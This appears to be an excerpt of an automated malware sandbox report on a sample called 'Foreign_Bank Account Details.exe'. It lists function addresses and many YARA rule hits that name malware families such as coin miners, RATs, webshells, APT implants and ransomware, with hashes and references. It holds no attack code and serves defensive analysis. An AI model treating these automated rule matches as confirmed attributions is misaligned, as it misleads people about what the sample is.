Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4F76C 42_2_00007FF650D4F76C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D2490C 42_2_00007FF650D2490C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D5B88C 42_2_00007FF650D5B88C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D5D9D0 42_2_00007FF650D5D9D0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CEB944 42_2_00007FF650CEB944
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D61950 42_2_00007FF650D61950
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D59B34 42_2_00007FF650D59B34
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D10AB0 42_2_00007FF650D10AB0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D0AA68 42_2_00007FF650D0AA68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D5BA74 42_2_00007FF650D5BA74
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D11C10 42_2_00007FF650D11C10
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D01D00 42_2_00007FF650D01D00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D13CE0 42_2_00007FF650D13CE0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D5CCC8 42_2_00007FF650D5CCC8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D03C87 42_2_00007FF650D03C87
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D5BC60 42_2_00007FF650D5BC60
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D61E00 42_2_00007FF650D61E00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D42DD4 42_2_00007FF650D42DD4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D5DD9C 42_2_00007FF650D5DD9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D41D78 42_2_00007FF650D41D78
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D45ED0 42_2_00007FF650D45ED0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D5BE48 42_2_00007FF650D5BE48
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D1502C 42_2_00007FF650D1502C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D5C034 42_2_00007FF650D5C034
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFEFCC 42_2_00007FF650CFEFCC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D65F9C 42_2_00007FF650D65F9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D0FFA8 42_2_00007FF650D0FFA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFDFB4 42_2_00007FF650CFDFB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D57108 42_2_00007FF650D57108
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CEB0C8 42_2_00007FF650CEB0C8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D6B058 42_2_00007FF650D6B058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D5D058 42_2_00007FF650D5D058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D47050 42_2_00007FF650D47050
Uses 32bit PE files
Source: Foreign_Bank Account Details.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 35.3.MpSigStub.exe.15b1ad30826.62.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1b9c89b2.43.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1b9c89b2.43.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 35.3.MpSigStub.exe.15b1b9c89b2.43.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 35.3.MpSigStub.exe.15b1a7d1391.177.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b59d455.123.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59d455.123.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b59e859.148.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59e859.148.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bf2fb91.211.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b41327e.91.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.15b1a7cea69.179.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 35.3.MpSigStub.exe.15b1b78484d.88.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.15b1bf798f9.36.raw.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 35.3.MpSigStub.exe.15b1bf2fb91.132.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 35.3.MpSigStub.exe.15b1b09d292.197.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 35.3.MpSigStub.exe.15b1b59d455.107.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59d455.107.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.raw.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE Matched rule: APT_apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE Matched rule: apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 35.3.MpSigStub.exe.15b1bde4c13.118.raw.unpack, type: UNPACKEDPE Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 35.3.MpSigStub.exe.15b1bde4c13.118.raw.unpack, type: UNPACKEDPE Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 35.3.MpSigStub.exe.15b1bde4c13.118.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.15b1b09d292.124.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 35.3.MpSigStub.exe.15b1c2da78e.186.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.raw.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b352d6a.96.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 35.3.MpSigStub.exe.15b1b59fe5d.109.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59fe5d.109.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bcea0d6.57.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
